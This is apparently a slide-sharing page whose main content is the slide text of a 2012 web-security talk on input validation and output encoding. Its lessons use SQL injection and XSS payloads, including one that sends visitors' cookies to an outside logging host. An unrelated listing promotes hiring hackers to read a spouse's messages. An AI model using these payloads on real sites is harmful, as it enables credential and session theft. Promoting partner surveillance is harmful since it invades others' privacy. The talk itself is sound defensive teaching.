In this talk, I'll go over the techniques we've picked up by analyzing millions of datapoints daily. I'll cover some simple rules to filter out invalid data, and the statistics to analyze and make sense of what's left. Do you use the mean, median or mode? What about the geometric mean and standard deviation? How confident are we in the results? And finally, why should we care?
This talk should help you gain useful insights from a histogram, or at the very least point you in the right direction for further analysis.
Abusing JavaScript to Measure Web PerformancePhilip Tellis
While building boomerang, we developed many interesting methods to measure network performance characteristics using JavaScript running in the browser. While the W3C's NavigationTiming API provides access to many performance metrics, there's far more you can get at with some creative tweaking and analysis of how the browser reacts to certain requests.
In this talk, I'll go into the details of how boomerang works to measure network throughput, latency, TCP connect time, DNS time and IPv6 connectivity. I'll also touch upon some of the other performance related browser APIs we use to gather useful information. I will NOT be covering the W3C Navigation Timing API since that's been covered by Alois Reitbauer in a previous Boston Web Perf talk.
The document discusses analyzing real user monitoring (RUM) data to gain insights into website performance and user behavior. It describes building plugins to collect navigation and timing data from browsers. Various statistical techniques for analyzing the data are covered, including log-normal distributions, filtering outliers, sampling, and correlating metrics like page load time and bounce rates. The analysis of an example 8 million page dataset suggests very fast or slow page loads are associated with higher bounce rates, and thresholds for user-unfriendly performance are proposed based on bounce rates exceeding 50%.
Analysing network characteristics with JavaScriptPhilip Tellis
This document contains slides from a presentation about using JavaScript to analyze network performance. It discusses how to measure latency, TCP handshake time, network throughput, DNS lookup time, IPv6 support and latency, and private network scanning using JavaScript. Code examples are provided for measuring each of these network metrics by making image requests and timing the responses. The presentation emphasizes that accurately measuring network throughput requires requesting resources of different sizes and accounting for TCP slow start. It also notes some challenges around caching and geo-located DNS results.
A Node.JS bag of goodies for analyzing Web TrafficPhilip Tellis
This document is a presentation about analyzing web traffic using Node.js modules. It introduces Node.js and the npm package manager. It then discusses modules for parsing HTTP logs, including parsing user agents, handling IP addresses, geolocation, and date formatting. It also covers modules for statistical analysis like fast-stats, gauss, and statsd. The presentation provides code examples for using these modules and takes questions at the end.
Messing with JavaScript and the DOM to measure network characteristicsPhilip Tellis
This document discusses using JavaScript to analyze network performance. It covers measuring latency, TCP handshake time, DNS lookup time, network throughput, and IPv6 support. The document provides code examples for measuring each of these metrics using JavaScript and analyzing image load times. It notes that network conditions vary and accurate measurements require statistical analysis over many samples.
Boomerang: How fast do users think your site is?Philip Tellis
This document discusses how the Boomerang tool works to measure website performance from the end user's perspective. Boomerang is a piece of JavaScript code that measures network latency and throughput to the website, as well as page load time, and sends this performance data back to the website owners. It provides more accurate real-world performance metrics than lab testing by measuring performance across varying user devices, browsers, networks and other conditions that are outside the owners' control.
Comparison Table of DiskWarrior Alternatives.pdfAndrey Yasko
To help you choose the best DiskWarrior alternative, we've compiled a comparison table summarizing the features, pros, cons, and pricing of six alternatives.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Transcript: Details of description part II: Describing images in practice - T...BookNet Canada
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and slides: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc
Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...Bert Blevins
Today’s digitally connected world presents a wide range of security challenges for enterprises. Insider security threats are particularly noteworthy because they have the potential to cause significant harm. Unlike external threats, insider risks originate from within the company, making them more subtle and challenging to identify. This blog aims to provide a comprehensive understanding of insider security threats, including their types, examples, effects, and mitigation techniques.
Quantum Communications Q&A with Gemini LLM. These are based on Shannon's Noisy channel Theorem and offers how the classical theory applies to the quantum world.
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...Toru Tamaki
Jindong Gu, Zhen Han, Shuo Chen, Ahmad Beirami, Bailan He, Gengyuan Zhang, Ruotong Liao, Yao Qin, Volker Tresp, Philip Torr "A Systematic Survey of Prompt Engineering on Vision-Language Foundation Models" arXiv2023
https://arxiv.org/abs/2307.12980
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsMydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxSynapseIndia
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
Are you interested in dipping your toes in the cloud native observability waters, but as an engineer you are not sure where to get started with tracing problems through your microservices and application landscapes on Kubernetes? Then this is the session for you, where we take you on your first steps in an active open-source project that offers a buffet of languages, challenges, and opportunities for getting started with telemetry data.
The project is called openTelemetry, but before diving into the specifics, we’ll start with de-mystifying key concepts and terms such as observability, telemetry, instrumentation, cardinality, percentile to lay a foundation. After understanding the nuts and bolts of observability and distributed traces, we’ll explore the openTelemetry community; its Special Interest Groups (SIGs), repositories, and how to become not only an end-user, but possibly a contributor.We will wrap up with an overview of the components in this project, such as the Collector, the OpenTelemetry protocol (OTLP), its APIs, and its SDKs.
Attendees will leave with an understanding of key observability concepts, become grounded in distributed tracing terminology, be aware of the components of openTelemetry, and know how to take their first steps to an open-source contribution!
Key Takeaways: Open source, vendor neutral instrumentation is an exciting new reality as the industry standardizes on openTelemetry for observability. OpenTelemetry is on a mission to enable effective observability by making high-quality, portable telemetry ubiquitous. The world of observability and monitoring today has a steep learning curve and in order to achieve ubiquity, the project would benefit from growing our contributor community.
Best Practices for Effectively Running dbt in Airflow.pdfTatiana Al-Chueyr
As a popular open-source library for analytics engineering, dbt is often used in combination with Airflow. Orchestrating and executing dbt models as DAGs ensures an additional layer of control over tasks, observability, and provides a reliable, scalable environment to run dbt models.
This webinar will cover a step-by-step guide to Cosmos, an open source package from Astronomer that helps you easily run your dbt Core projects as Airflow DAGs and Task Groups, all with just a few lines of code. We’ll walk through:
- Standard ways of running dbt (and when to utilize other methods)
- How Cosmos can be used to run and visualize your dbt projects in Airflow
- Common challenges and how to address them, including performance, dependency conflicts, and more
- How running dbt projects in Airflow helps with cost optimization
Webinar given on 9 July 2024
How RPA Help in the Transportation and Logistics Industry.pptxSynapseIndia
Revolutionize your transportation processes with our cutting-edge RPA software. Automate repetitive tasks, reduce costs, and enhance efficiency in the logistics sector with our advanced solutions.
Implementations of Fused Deposition Modeling in real worldEmerging Tech
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
Sustainability requires ingenuity and stewardship. Did you know Pigging Solutions pigging systems help you achieve your sustainable manufacturing goals AND provide rapid return on investment.
How? Our systems recover over 99% of product in transfer piping. Recovering trapped product from transfer lines that would otherwise become flush-waste, means you can increase batch yields and eliminate flush waste. From raw materials to finished product, if you can pump it, we can pig it.
How Social Media Hackers Help You to See Your Wife's Message.pdfHackersList
In the modern digital era, social media platforms have become integral to our daily lives. These platforms, including Facebook, Instagram, WhatsApp, and Snapchat, offer countless ways to connect, share, and communicate.
Best Programming Language for Civil EngineersAwais Yaseen
The integration of programming into civil engineering is transforming the industry. We can design complex infrastructure projects and analyse large datasets. Imagine revolutionizing the way we build our cities and infrastructure, all by the power of coding. Programming skills are no longer just a bonus—they’re a game changer in this era.
Technology is revolutionizing civil engineering by integrating advanced tools and techniques. Programming allows for the automation of repetitive tasks, enhancing the accuracy of designs, simulations, and analyses. With the advent of artificial intelligence and machine learning, engineers can now predict structural behaviors under various conditions, optimize material usage, and improve project planning.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
INDIAN AIR FORCE FIGHTER PLANES LIST.pdfjackson110191
These fighter aircraft have uses outside of traditional combat situations. They are essential in defending India's territorial integrity, averting dangers, and delivering aid to those in need during natural calamities. Additionally, the IAF improves its interoperability and fortifies international military alliances by working together and conducting joint exercises with other air forces.
1. Is What You Get, What You Expect to Get?
Philip Tellis / philip@lognormal.com
ConFoo.ca / 2012-03-01
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
3. $ finger philip
Philip Tellis
philip@lognormal.com
@bluesmoon
geek - paranoid - speedfreak
co-founder Log-Normal
http://bluesmoon.info/
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
4. WARNING !
This presentation may contain unreadable code. Attempting to read it
is probably not worthwhile. Definitely not at 08:30. Screaming
WTF!!1! probably is.
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
5. How do you distinguish code from data?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
6. < > ’ " & % ‘
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
7. Failure to tell the difference. . .
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
8. Note: This talk is NOT about XSS or SQLi,
but it might seem like it
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
9. Let’s look at a few examples
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
10. http://xxyyzz.com/forms/contact_form.asp?i=
0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28
%27%3c%28%20%27%2buserId%29,%28firstname
%2b%27%20%27%2blastname%29,%28address%2b
%27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16,
%28email%2b%27%20-Password:%20%27%27
%2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21,
22,23,24,25,26,27,28,29,30%20FROM%20
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
11. http://xxyyzz.com/forms/contact_form.asp?i=
0’ UNION ALL SELECT 1,2,3,4,5, (
’ < ( ’ + userId ) , ( firstname
+ ’ ’ + lastname ) , ( address +
’ city: ’ + city ) ,9,10,11,12,13,14,15,16,
( email + ’ -Password: ’ ’
+ userpwd + ’ ) > ’ ) ,18,19,20,21,
22,23,24,25,26,27,28,29,30 FROM
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
12. Expected a positive integer, but got more than that
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
13. <?php
$id = htmlspecialchars($_GET[ ’id’ ]);
?>
...
value : <?php echo ($id) ? $id : ’null’; ?>
This is JavaScript code generated by PHP
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
17. Expected a positive integer, but got more than that
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
18. <a
<?php echo ’href=/stock_price?f=’ .
htmlspecialchars($_GET[’f’]);
?>
>
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
19. <a
<?php echo ’href=/stock_price?f=’ .
htmlspecialchars($_GET[’f’]);
?>
>
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
20. use the quotes luke
<a "
<?php echo ’href=/stock_price?f=’ .
htmlspecialchars($_GET[’f’]);
?>
>
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
24. The char codes translate to:
<img src=x onerror=(document.location=’
http://standard33.freehostia.com/CS/lg.php?info=’
+escape(document.cookie))>
$f was html encoded, but used unquoted as an attribute
value.
Remember that spaces are never encoded.
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
25. Expected a stock symbol, but got more than that
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
26. <?php
$host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);
?>
...
var host = "<?php echo $host ?>";
var div = document.getElementById("l");
div.innerHTML = "<a href="http://xxx.xx.com/gethost?h=""
+ host + ">" + host + "</a>";
Notice the different contexts
What’s special (meta) to one language but not the other?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
27. <?php
$host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);
?>
...
var host = "<?php echo $host ?>";
var div = document.getElementById("l");
div.innerHTML = "<a href="http://xxx.xx.com/gethost?h=""
+ host + ">" + host + "</a>";
Notice the different contexts
What’s special (meta) to one language but not the other?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
28. <?php
$host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);
?>
...
var host = "<?php echo $host ?>";
var div = document.getElementById("l");
div.innerHTML = "<a href="http://xxx.xx.com/gethost?h=""
+ host + ">" + host + "</a>";
Notice the different contexts
What’s special (meta) to one language but not the other?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
29. <?php
$host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);
?>
...
var host = "<?php echo $host ?>";
var div = document.getElementById("l");
div.innerHTML = "<a href="http://xxx.xx.com/gethost?h=""
+ host + ">" + host + "</a>";
Notice the different contexts
What’s special (meta) to one language but not the other?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
30. <?php
$host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);
?>
...
var host = "<?php echo $host ?>";
var div = document.getElementById("l");
div.innerHTML = "<a href="http://xxx.xx.com/gethost?h=""
+ host + ">" + host + "</a>";
Notice the different contexts
What’s special (meta) to one language but not the other?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
31. <?php
$host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);
?>
...
var host = "<?php echo $host ?>";
var div = document.getElementById("l");
div.innerHTML = "<a href="http://xxx.xx.com/gethost?h=""
+ host + ">" + host + "</a>";
Notice the different contexts
What’s special (meta) to one language but not the other?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
33. h= " > < img src = " foo "
onerror = " alert( ’ xss ’ )
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
34. h="><img src="foo"
onerror="alert(’xss’)
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
35. Expected a hostname, but got something completely different
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
36. Dear IE6
<input value="[e0]"> "onmouseover=alert(0) >
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
37. Dear IE6
<input value="[e0]"> "onmouseover=alert(0) >
That’s 0xe0, start of 3 byte seq
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
38. Dear IE6
<input value=""onmouseover=alert(0) >
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
39. Expected valid UTF-8, got invalid UTF-8
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
40. So what’s the common theme here?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
41. Should I be Validating Input or Encoding Output?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
42. They solve two different problems, and you need both
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
43. Output Encoding (done automatically by your framework)
protects your users from XSS
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
44. Input Validation is a data quality issue
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
45. Is the input you get from a user of the type and range
that you expect it to be?
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
46. Sometimes it results in back end code injection
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
47. But it always results in bad data
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
48. Bonus Example: This hit me in production yesterday
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
49. regex to check if text was a subdomain of a known domain
re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’);
re.exec(ref)
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
50. Sometimes IE8 will serve requests from a .mht file
mhtml:file://C:Usersblah-blah-blah.mht
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
51. I expected the regex to reject this text
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
52. What I got was 100% CPU spent in regex backtracking
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
54. Unrelated Bonus Example: From a WordPress theme
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
55. <?php
$value=htmlspecialchars($_GET[’value’], ENT_QUOTES);
?>
<input type="text"
value="<?php echo $value ?>"
onfocus="if(this.value==’<?php echo $value ?>’)
{this.value = ’’;}" />
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
56. <input type="text"
value="'+alert(/xss/)+'"
onfocus="if(this.value==’'+alert(/xss/)+'’)
{this.value = ’’;}" />
Inside an on* handler, html entities are decoded before they
are passed on to JavaScript
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
57. <input type="text"
value="'+alert(/xss/)+'"
onfocus="if(this.value==’'+alert(/xss/)+'’)
{this.value = ’’;}" />
Inside an on* handler, html entities are decoded before they
are passed on to JavaScript
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
58. <input type="text"
value="'+alert(/xss/)+'"
onfocus="if(this.value==’’ +alert(/xss/)+ ’’)
{this.value = ’’;}" />
Inside an on* handler, html entities are decoded before they
are passed on to JavaScript
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
59. I have no idea what was expected here
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
61. Contact me
Philip Tellis
philip@lognormal.com
@bluesmoon
geek - paranoid - speedfreak
co-founder Log-Normal
http://bluesmoon.info/
slideshare.net/bluesmoon
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44